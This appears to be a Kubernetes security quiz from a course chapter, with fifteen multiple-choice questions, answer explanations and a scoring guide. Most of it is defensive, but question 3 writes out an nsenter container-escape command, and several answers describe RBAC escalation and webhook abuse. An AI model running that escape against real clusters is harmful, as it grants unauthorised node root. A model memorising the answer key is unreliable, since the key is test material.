Skip to content

Chapter 51 Quiz: Kubernetes Security

Test your knowledge of Kubernetes architecture security, Pod Security Standards, RBAC, container escapes, secrets management, network policies, supply chain security, runtime detection, etcd protection, and audit logging.


Questions

1. Which Kubernetes control plane component stores all cluster state and secrets, making it the highest-value target for an attacker who has gained cluster access?

  • A) kube-scheduler
  • B) kube-controller-manager
  • C) etcd — it stores all cluster state including secrets in key-value pairs, and if compromised, gives the attacker access to every secret, configuration, and resource definition in the cluster
  • D) kube-proxy
Answer

C — etcd — it stores all cluster state including secrets in key-value pairs, and if compromised, gives the attacker access to every secret, configuration, and resource definition in the cluster

etcd is the distributed key-value store that serves as the single source of truth for all Kubernetes cluster state. Every secret, ConfigMap, RBAC policy, and resource definition is stored here. An attacker with direct etcd access can read all secrets (bypassing RBAC entirely), modify cluster state, and create backdoor accounts. Protection requires mTLS, network isolation, encryption at rest, and restricted access to the etcd client port (2379).


2. What are the three Pod Security Standards profiles defined in Kubernetes, and which one should be enforced for production workloads?

  • A) Low, Medium, High — use High for production
  • B) Privileged (unrestricted), Baseline (minimally restrictive to prevent known escalations), Restricted (heavily restricted following hardening best practices) — use Restricted for production workloads
  • C) Default, Enhanced, Maximum — use Maximum for production
  • D) Open, Guarded, Locked — use Locked for production
Answer

B — Privileged (unrestricted), Baseline (minimally restrictive to prevent known escalations), Restricted (heavily restricted following hardening best practices) — use Restricted for production workloads

Pod Security Standards (PSS) replaced the deprecated PodSecurityPolicy (PSP). The Privileged profile is completely unrestricted (useful only for system-level workloads like CNI plugins). The Baseline profile prevents known privilege escalation vectors (hostNetwork, hostPID, privileged containers). The Restricted profile enforces hardening best practices including running as non-root, dropping all capabilities, read-only root filesystem, and seccomp profiles. Enforcement is applied at the namespace level using labels: pod-security.kubernetes.io/enforce: restricted.


3. An attacker has compromised a pod running with hostPID: true and privileged: true. What container escape technique can they execute, and why do these settings enable it?

  • A) They can only read host logs
  • B) They can use nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash to escape into the host's PID 1 namespace, gaining full root access to the node — hostPID gives visibility into host processes and privileged removes all security boundaries
  • C) They can only access other containers in the same pod
  • D) They can modify Kubernetes RBAC policies remotely
Answer

B — They can use nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash to escape into the host's PID 1 namespace, gaining full root access to the node — hostPID gives visibility into host processes and privileged removes all security boundaries

hostPID: true mounts the host's PID namespace into the container, making all host processes visible. privileged: true disables seccomp, AppArmor, drops all capability restrictions, and grants all Linux capabilities (including CAP_SYS_ADMIN, CAP_SYS_PTRACE). Together, these allow the attacker to use nsenter to enter the host's init process (PID 1) namespaces, effectively escaping the container with full root privileges on the host. From there, they can access the kubelet credentials, pivot to other nodes, and compromise the entire cluster.


4. Why is granting the escalate verb in an RBAC Role considered extremely dangerous, even more so than granting create on Roles?

  • A) The escalate verb is deprecated and has no effect
  • B) The escalate verb allows a subject to create or modify Roles/ClusterRoles with permissions exceeding their own — effectively bypassing the Kubernetes RBAC escalation prevention mechanism and enabling privilege escalation to cluster-admin
  • C) The escalate verb only affects pod scheduling
  • D) The escalate verb is equivalent to get on secrets
Answer

B — The escalate verb allows a subject to create or modify Roles/ClusterRoles with permissions exceeding their own — effectively bypassing the Kubernetes RBAC escalation prevention mechanism and enabling privilege escalation to cluster-admin

Kubernetes normally prevents users from creating Roles with permissions they don't already have. The escalate verb bypasses this protection entirely. A user with escalate on Roles can create a Role with * (wildcard) verbs on * resources, bind it to themselves, and become a cluster-admin. Similarly dangerous are the bind verb (attach any existing Role/ClusterRole to yourself) and impersonate (act as any user/group/service account). Security teams should alert on any RBAC policy containing these three verbs.


5. What is the primary risk of using native Kubernetes Secrets without enabling encryption at rest, and how does an attacker exploit this?

  • A) Secrets are automatically encrypted and safe by default
  • B) Kubernetes Secrets are only base64-encoded (not encrypted) and stored in etcd in plaintext — any attacker with direct etcd access or etcdctl can read all secrets without Kubernetes RBAC checks, bypassing the API server entirely
  • C) Secrets are stored in the container filesystem and require pod access
  • D) Secrets are protected by network policies and cannot be read externally
Answer

B — Kubernetes Secrets are only base64-encoded (not encrypted) and stored in etcd in plaintext — any attacker with direct etcd access or etcdctl can read all secrets without Kubernetes RBAC checks, bypassing the API server entirely

Base64 is an encoding scheme, not encryption — echo "cGFzc3dvcmQ=" | base64 -d instantly reveals the secret. Without an EncryptionConfiguration with AES-CBC, AES-GCM, or a KMS provider, all secrets in etcd are readable by anyone with etcd access. This bypasses Kubernetes RBAC because the attacker is reading etcd directly, not going through the API server. Mitigation: enable encryption at rest using EncryptionConfiguration, use a KMS provider (AWS KMS, Azure Key Vault, GCP Cloud KMS) for key management, and migrate sensitive credentials to external secrets managers (HashiCorp Vault, AWS Secrets Manager).


6. A security engineer deploys a NetworkPolicy with policyTypes: ["Ingress", "Egress"] in a namespace running the default Flannel CNI (without network policy support). What happens?

  • A) All traffic to and from pods in the namespace is immediately blocked
  • B) The NetworkPolicy resource is accepted and stored in etcd, but has zero runtime effect — all traffic continues to flow freely because the default Flannel CNI does not implement NetworkPolicy enforcement
  • C) Kubernetes rejects the NetworkPolicy with an error
  • D) The NetworkPolicy is automatically converted to iptables rules
Answer

B — The NetworkPolicy resource is accepted and stored in etcd, but has zero runtime effect — all traffic continues to flow freely because the default Flannel CNI does not implement NetworkPolicy enforcement

This is one of the most dangerous silent failures in Kubernetes. The API server has no awareness of CNI capabilities — it validates the NetworkPolicy schema and stores it in etcd regardless. The security team believes traffic is restricted, but the CNI never programmed any iptables/eBPF rules to enforce it. Verification steps: deploy a test pod and attempt to reach a pod that should be blocked; use tools like cyclonus or netassert for automated testing; confirm the CNI (Calico, Cilium, Antrea) supports and is actively enforcing policies.


7. How does Cosign image signing with keyless mode (Sigstore) work, and why is it preferred over traditional key-based signing for CI/CD pipelines?

  • A) Keyless mode uses short-lived certificates tied to CI/CD workload identity (e.g., GitHub Actions OIDC token) instead of long-lived signing keys — eliminating the key management burden and the risk of key theft while providing verifiable provenance tied to the specific pipeline run
  • B) Keyless mode does not actually sign images; it only creates a hash
  • C) Keyless mode requires a hardware security module (HSM) for every signing operation
  • D) Keyless mode is less secure because it does not use cryptographic signatures
Answer

A — Keyless mode uses short-lived certificates tied to CI/CD workload identity (e.g., GitHub Actions OIDC token) instead of long-lived signing keys — eliminating the key management burden and the risk of key theft while providing verifiable provenance tied to the specific pipeline run

Sigstore's keyless signing flow: (1) the CI/CD pipeline requests an OIDC identity token from its identity provider (GitHub Actions, GitLab CI); (2) Fulcio (Sigstore's CA) verifies the OIDC token and issues a short-lived X.509 certificate; (3) the image is signed with the ephemeral private key; (4) the signature and certificate are recorded in Rekor (Sigstore's transparency log) for auditability; (5) the private key is discarded. Verification checks the Rekor log entry, the Fulcio certificate chain, and the OIDC identity. This eliminates key rotation, key storage, and key theft risks.


8. What KQL query would detect an attacker creating a ClusterRoleBinding to the cluster-admin ClusterRole — a common persistence technique in Kubernetes?

  • A) SecurityEvent | where EventID == 4720
  • B) KubeAuditLogs | where Verb == "create" and ObjectRef_Resource == "clusterrolebindings" | extend RoleRef = parse_json(RequestObject).roleRef | where RoleRef.name == "cluster-admin" — this filters audit logs for ClusterRoleBinding creation events and checks if the bound role is cluster-admin
  • C) SigninLogs | where ResultType == 0
  • D) AzureActivity | where OperationName == "Create Role"
Answer

B — KubeAuditLogs | where Verb == "create" and ObjectRef_Resource == "clusterrolebindings" | extend RoleRef = parse_json(RequestObject).roleRef | where RoleRef.name == "cluster-admin" — this filters audit logs for ClusterRoleBinding creation events and checks if the bound role is cluster-admin

Creating a ClusterRoleBinding to cluster-admin is one of the most critical persistence techniques in Kubernetes (mapped to T1098 Account Manipulation). This query parses the audit log to extract the roleRef from the request object and alerts when it references cluster-admin. The detection should also alert on bindings to any ClusterRole with wildcard permissions (* verbs on * resources), as attackers may create a custom ClusterRole equivalent to cluster-admin to evade detection of the specific name.


9. What is the difference between Falco and Tetragon for Kubernetes runtime security, and when would you deploy both?

  • A) They are identical tools from different vendors
  • B) Falco is detect-only (monitors syscalls via eBPF and generates alerts); Tetragon provides both detection and enforcement (can kill processes or override return values at the kernel level before malicious actions complete) — deploy both when you need Tetragon's enforcement on critical paths and Falco's broad detection with SIEM integration
  • C) Falco only works on VMs; Tetragon only works on Kubernetes
  • D) Tetragon replaces Falco in all scenarios
Answer

B — Falco is detect-only (monitors syscalls via eBPF and generates alerts); Tetragon provides both detection and enforcement (can kill processes or override return values at the kernel level before malicious actions complete) — deploy both when you need Tetragon's enforcement on critical paths and Falco's broad detection with SIEM integration

Falco has a mature ecosystem with extensive default rulesets, a large community, and well-tested SIEM integrations. Tetragon (by Cilium/Isovalent) adds enforcement capabilities — it can SIGKILL a process or block a syscall before it completes, providing prevention rather than just detection. In production, Tetragon handles enforcement on critical security paths (container escapes, credential file access), while Falco provides broad visibility and SIEM-integrated alerting across the entire cluster.


10. An operator runs kubectl auth can-i --list --as=system:serviceaccount:production:default and discovers the default service account can list secrets cluster-wide. What is the root cause and remediation?

  • A) This is expected behavior and requires no action
  • B) A ClusterRoleBinding or overly permissive ClusterRole is granting the default service account excessive permissions — remediation: delete the binding, create a namespace-scoped Role with only required permissions, disable automounting of the default SA token with automountServiceAccountToken: false, and create dedicated service accounts for each workload
  • C) The kubectl command is showing incorrect results
  • D) Network policies are blocking proper RBAC evaluation
Answer

B — A ClusterRoleBinding or overly permissive ClusterRole is granting the default service account excessive permissions — remediation: delete the binding, create a namespace-scoped Role with only required permissions, disable automounting of the default SA token with automountServiceAccountToken: false, and create dedicated service accounts for each workload

The default service account is automatically mounted into every pod that doesn't specify a service account. If this SA has cluster-wide secret listing permissions, every pod in the namespace can enumerate all secrets across the cluster. Remediation steps: (1) identify and delete the offending ClusterRoleBinding; (2) set automountServiceAccountToken: false on the default SA; (3) create dedicated SAs for each workload with minimum required permissions; (4) use namespace-scoped Roles instead of ClusterRoles for workload permissions.


11. Why must etcd backups be encrypted, and what attack does an unencrypted backup enable even if etcd encryption at rest is configured?

  • A) Backups don't contain sensitive data
  • B) Even with encryption at rest enabled in Kubernetes, an etcdctl snapshot save backup contains the raw etcd data — if encryption at rest uses the aescbc or aesgcm provider with a locally stored key, the backup contains the encrypted data AND the encryption key is accessible on the control plane node, allowing an attacker who steals the backup to decrypt all secrets offline
  • C) Backups are automatically encrypted by the operating system
  • D) Encryption at rest protects backups automatically
Answer

B — Even with encryption at rest enabled in Kubernetes, an etcdctl snapshot save backup contains the raw etcd data — if encryption at rest uses the aescbc or aesgcm provider with a locally stored key, the backup contains the encrypted data AND the encryption key is accessible on the control plane node, allowing an attacker who steals the backup to decrypt all secrets offline

The encryption key in the EncryptionConfiguration file is stored on the control plane node's filesystem. An attacker who obtains both the etcd backup and access to the control plane node (or a copy of the EncryptionConfiguration) can decrypt every secret. Mitigation: use a KMS provider (the KMS key never leaves the HSM), encrypt backups with a separate key before storing them, store backups in encrypted storage with access controls separate from the cluster, and rotate the etcd encryption key regularly.


12. What Kubernetes audit policy level should be used for Secret access events, and why is RequestResponse level dangerous for Secrets specifically?

  • A) None — Secrets should never be audited
  • B) Use Metadata level for Secret access — RequestResponse level would log the full request and response bodies, meaning every Secret value would be written to the audit log in cleartext, effectively creating a second copy of all secrets in the log storage system
  • C) RequestResponse is always the safest level for all resources
  • D) Audit logging does not apply to Secrets
Answer

B — Use Metadata level for Secret access — RequestResponse level would log the full request and response bodies, meaning every Secret value would be written to the audit log in cleartext, effectively creating a second copy of all secrets in the log storage system

Kubernetes audit logging supports four levels: None, Metadata, Request, RequestResponse. For Secrets, logging at Request or RequestResponse level writes the base64-encoded secret values into the audit log. Since base64 is trivially reversible, this means every secret is now also stored in your SIEM, log aggregator, or backup system — dramatically expanding the attack surface. The recommended approach: log Secret get, list, and watch at Metadata level (who accessed what, when) and log create, update, delete at Request level (to capture who changed the secret, but not the read path).


13. How can a mutating admission webhook be weaponized for persistent cluster compromise, and what is the detection strategy?

  • A) Mutating webhooks can only modify labels and annotations
  • B) An attacker with permissions to create MutatingWebhookConfigurations can register a webhook that silently injects a sidecar container, environment variable, or volume mount into every new pod — the modification is transparent to pod creators and persists as long as the webhook exists. Detect by monitoring audit logs for webhook configuration changes and comparing deployed pod specs against source definitions
  • C) Mutating webhooks are validated by the API server and cannot inject malicious content
  • D) Webhooks only work during cluster upgrades
Answer

B — An attacker with permissions to create MutatingWebhookConfigurations can register a webhook that silently injects a sidecar container, environment variable, or volume mount into every new pod — the modification is transparent to pod creators and persists as long as the webhook exists. Detect by monitoring audit logs for webhook configuration changes and comparing deployed pod specs against source definitions

Mutating admission webhooks intercept API requests before persistence to etcd and can modify the request object arbitrarily. An attacker's webhook could: inject a reverse shell sidecar into every new pod, add environment variables that exfiltrate secrets, mount hostPath volumes for node access, or modify resource limits for crypto-mining. Detection: (1) alert on create/update of mutatingwebhookconfigurations; (2) flag webhooks pointing to external endpoints or non-system namespaces; (3) deploy a canary pod and compare its running spec against its declared spec; (4) restrict webhook configuration permissions to cluster administrators only.


14. What is the security significance of the --anonymous-auth flag on the Kubernetes API server, and what attack does it enable when combined with permissive RBAC?

  • A) Anonymous auth has no security impact
  • B) When --anonymous-auth=true (the default), unauthenticated requests are assigned the system:anonymous user and system:unauthenticated group — if any ClusterRoleBinding grants permissions to these identities, any unauthenticated attacker on the network can interact with the API server, potentially listing pods, reading ConfigMaps, or even creating workloads
  • C) Anonymous auth only allows read access to public APIs
  • D) Anonymous auth is disabled by default in all Kubernetes distributions
Answer

B — When --anonymous-auth=true (the default), unauthenticated requests are assigned the system:anonymous user and system:unauthenticated group — if any ClusterRoleBinding grants permissions to these identities, any unauthenticated attacker on the network can interact with the API server, potentially listing pods, reading ConfigMaps, or even creating workloads

Anonymous authentication is enabled by default in Kubernetes because some health check endpoints require it. The risk arises when RBAC bindings grant permissions to system:anonymous or system:unauthenticated. A common misconfiguration is binding system:unauthenticated to the cluster-admin role (seen in real-world breaches of misconfigured managed clusters). Audit: run kubectl get clusterrolebindings -o json | jq '.items[] | select(.subjects[]?.name == "system:anonymous" or .subjects[]?.name == "system:unauthenticated")' to find dangerous bindings.


15. A cluster runs Cilium as the CNI with Hubble enabled. During an incident, the SOC needs to trace all network flows from a compromised pod to identify lateral movement. What command provides real-time L3/L4/L7 network visibility, and why is this superior to traditional packet capture?

  • A) tcpdump -i eth0 from the host node
  • B) hubble observe --pod compromised-namespace/compromised-pod --verdict FORWARDED --protocol TCP — Hubble provides identity-aware flow logs showing source/destination pod names, namespaces, labels, and L7 protocol details (HTTP paths, DNS queries, gRPC methods) without the overhead of raw packet capture, and integrates with Cilium's eBPF dataplane for minimal performance impact
  • C) kubectl logs on the compromised pod
  • D) netstat -an inside the container
Answer

B — hubble observe --pod compromised-namespace/compromised-pod --verdict FORWARDED --protocol TCP — Hubble provides identity-aware flow logs showing source/destination pod names, namespaces, labels, and L7 protocol details (HTTP paths, DNS queries, gRPC methods) without the overhead of raw packet capture, and integrates with Cilium's eBPF dataplane for minimal performance impact

Traditional packet capture (tcpdump) provides raw bytes without Kubernetes context — the analyst must manually correlate IP addresses to pod names, namespaces, and workloads. Hubble (Cilium's observability layer) provides Kubernetes-native flow visibility: every flow is annotated with pod name, namespace, labels, service account, and verdict (forwarded/dropped by policy). At L7, Hubble decodes HTTP, DNS, gRPC, and Kafka protocols, showing request paths, response codes, and latency. This dramatically accelerates incident response by eliminating the IP-to-identity correlation step. Hubble flows can be exported to Grafana, Elasticsearch, or a SIEM for historical analysis.


Scoring Guide

Score Assessment
13–15 Excellent — Strong Kubernetes security knowledge, ready for CKS-level challenges
10–12 Good — Solid foundation, review container escape and runtime security sections
7–9 Review Needed — Revisit RBAC, Pod Security Standards, and network policy enforcement
Below 7 Study Required — Re-read Chapter 51 thoroughly, complete Lab 27, and practice with a local cluster

Quiz covers: Architecture security model, Pod Security Standards, RBAC escalation, container escapes, secrets management, network policy enforcement, supply chain security, detection engineering, runtime security, etcd protection, audit logging